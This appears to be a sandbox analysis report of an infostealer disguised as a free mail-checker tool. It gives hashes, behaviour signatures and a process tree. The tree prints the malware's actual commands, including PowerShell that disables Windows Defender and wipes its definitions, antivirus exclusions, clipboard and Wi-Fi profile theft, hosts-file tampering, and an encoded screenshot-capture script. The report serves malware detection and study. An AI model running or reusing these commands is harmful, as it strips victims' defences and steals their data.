Analysis

  • max time kernel
    61s
  • max time network
    39s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    17-12-2024 21:16

General

  • Target

    Mail Access Checker by xRisky v2 [Free version].rar

  • Size

    173.8MB

  • MD5

    a6b32c78de05f46e70353c4ef78835d7

  • SHA1

    df2308aaa56a7171363a45ad74d4066395fdb28e

  • SHA256

    b823e4a9a2d447217bcc6c7a7f67cabd36eab432d7d7e9d6b580fadba2446667

  • SHA512

    34598fa8f4b353534ad0da5c98e16ec98794100c16879cad66cb51c9f985a5c211e7e012473c86643afec6440d51e793cb03787035609d5c5fc8e82c4479fc03

  • SSDEEP

    3145728:rdmoIl768Uzz+3baQahQQAlDHor/Jp3Jqm8zV/Qlrt33VxI6C8mRHll6D1Gs:clu8UPihorD3J8Ql13VxiDRHll6R

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 54 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies registry class 55 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Mail Access Checker by xRisky v2 [Free version].rar"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:3932
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:4772
    • C:\Users\Admin\Desktop\Mail Access Checker by xRisky v2 [Free version]\Mailaccess Checker by xRisky v2.exe
      "C:\Users\Admin\Desktop\Mail Access Checker by xRisky v2 [Free version]\Mailaccess Checker by xRisky v2.exe"
      1⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:916
      • C:\Users\Admin\Desktop\Mail Access Checker by xRisky v2 [Free version]\Data\Modules\Checker.exe
        "C:\Users\Admin\Desktop\Mail Access Checker by xRisky v2 [Free version]\Data\Modules\Checker.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2276
        • C:\Users\Admin\Desktop\Mail Access Checker by xRisky v2 [Free version]\Data\Modules\Checker.exe
          "C:\Users\Admin\Desktop\Mail Access Checker by xRisky v2 [Free version]\Data\Modules\Checker.exe"
          3⤵
          • Drops file in Drivers directory
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2784
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Mail Access Checker by xRisky v2 [Free version]\Data\Modules\Checker.exe'"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3320
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Mail Access Checker by xRisky v2 [Free version]\Data\Modules\Checker.exe'
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4768
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1716
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3492
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4840
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              5⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:5080
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4852
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic csproduct get uuid
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2600
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3312
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              5⤵
                PID:4212
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3880
              • C:\Windows\system32\reg.exe
                REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                5⤵
                  PID:4712
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:5000
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic path win32_VideoController get name
                  5⤵
                  • Detects videocard installed
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1272
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:3556
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic path win32_VideoController get name
                  5⤵
                  • Detects videocard installed
                  PID:1388
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Desktop\Mail Access Checker by xRisky v2 [Free version]\Data\Modules\Checker.exe""
                4⤵
                • Hide Artifacts: Hidden Files and Directories
                • Suspicious use of WriteProcessMemory
                PID:3596
                • C:\Windows\system32\attrib.exe
                  attrib +h +s "C:\Users\Admin\Desktop\Mail Access Checker by xRisky v2 [Free version]\Data\Modules\Checker.exe"
                  5⤵
                  • Views/modifies file attributes
                  PID:3408
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\    ‍.scr'"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2496
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\    ‍.scr'
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1924
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:1488
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  5⤵
                  • Enumerates processes with tasklist
                  PID:684
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:1416
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  5⤵
                  • Enumerates processes with tasklist
                  PID:4616
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                4⤵
                  PID:396
                  • C:\Windows\System32\Wbem\WMIC.exe
                    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                    5⤵
                      PID:3352
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                    4⤵
                      PID:4072
                      • C:\Windows\system32\tasklist.exe
                        tasklist /FO LIST
                        5⤵
                        • Enumerates processes with tasklist
                        PID:4784
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                      4⤵
                      • Clipboard Data
                      PID:2168
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell Get-Clipboard
                        5⤵
                        • Clipboard Data
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3872
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      4⤵
                        PID:2208
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          5⤵
                            PID:2364
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                          4⤵
                          • System Network Configuration Discovery: Wi-Fi Discovery
                          PID:3976
                          • C:\Windows\system32\netsh.exe
                            netsh wlan show profile
                            5⤵
                            • Event Triggered Execution: Netsh Helper DLL
                            • System Network Configuration Discovery: Wi-Fi Discovery
                            PID:4552
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "systeminfo"
                          4⤵
                            PID:1396
                            • C:\Windows\system32\systeminfo.exe
                              systeminfo
                              5⤵
                              • Gathers system information
                              PID:3892
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                            4⤵
                              PID:2836
                              • C:\Windows\system32\reg.exe
                                REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                5⤵
                                  PID:1328
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                4⤵
                                  PID:3004
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                    5⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:4576
                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jcptgfcr\jcptgfcr.cmdline"
                                      6⤵
                                        PID:3368
                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFDA9.tmp" "c:\Users\Admin\AppData\Local\Temp\jcptgfcr\CSC37D93B0F295446D0899BC5D28A3464F.TMP"
                                          7⤵
                                            PID:3408
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                      4⤵
                                        PID:3312
                                        • C:\Windows\system32\tree.com
                                          tree /A /F
                                          5⤵
                                            PID:4928
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                          4⤵
                                            PID:132
                                            • C:\Windows\system32\tree.com
                                              tree /A /F
                                              5⤵
                                                PID:1452
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                              4⤵
                                                PID:4584
                                                • C:\Windows\system32\attrib.exe
                                                  attrib -r C:\Windows\System32\drivers\etc\hosts
                                                  5⤵
                                                  • Drops file in Drivers directory
                                                  • Views/modifies file attributes
                                                  PID:4372
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                4⤵
                                                  PID:1512
                                                  • C:\Windows\system32\tree.com
                                                    tree /A /F
                                                    5⤵
                                                      PID:3556
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                    4⤵
                                                      PID:1184
                                                      • C:\Windows\system32\attrib.exe
                                                        attrib +r C:\Windows\System32\drivers\etc\hosts
                                                        5⤵
                                                        • Drops file in Drivers directory
                                                        • Views/modifies file attributes
                                                        PID:3168
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      4⤵
                                                        PID:3732
                                                        • C:\Windows\system32\tree.com
                                                          tree /A /F
                                                          5⤵
                                                            PID:3596
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                          4⤵
                                                            PID:1092
                                                            • C:\Windows\system32\tasklist.exe
                                                              tasklist /FO LIST
                                                              5⤵
                                                              • Enumerates processes with tasklist
                                                              PID:3972
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                            4⤵
                                                              PID:3516
                                                              • C:\Windows\system32\tree.com
                                                                tree /A /F
                                                                5⤵
                                                                  PID:3692
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "getmac"
                                                                4⤵
                                                                  PID:4040
                                                                  • C:\Windows\system32\getmac.exe
                                                                    getmac
                                                                    5⤵
                                                                      PID:2860
                                                                  • C:\Windows\system32\cmd.exe
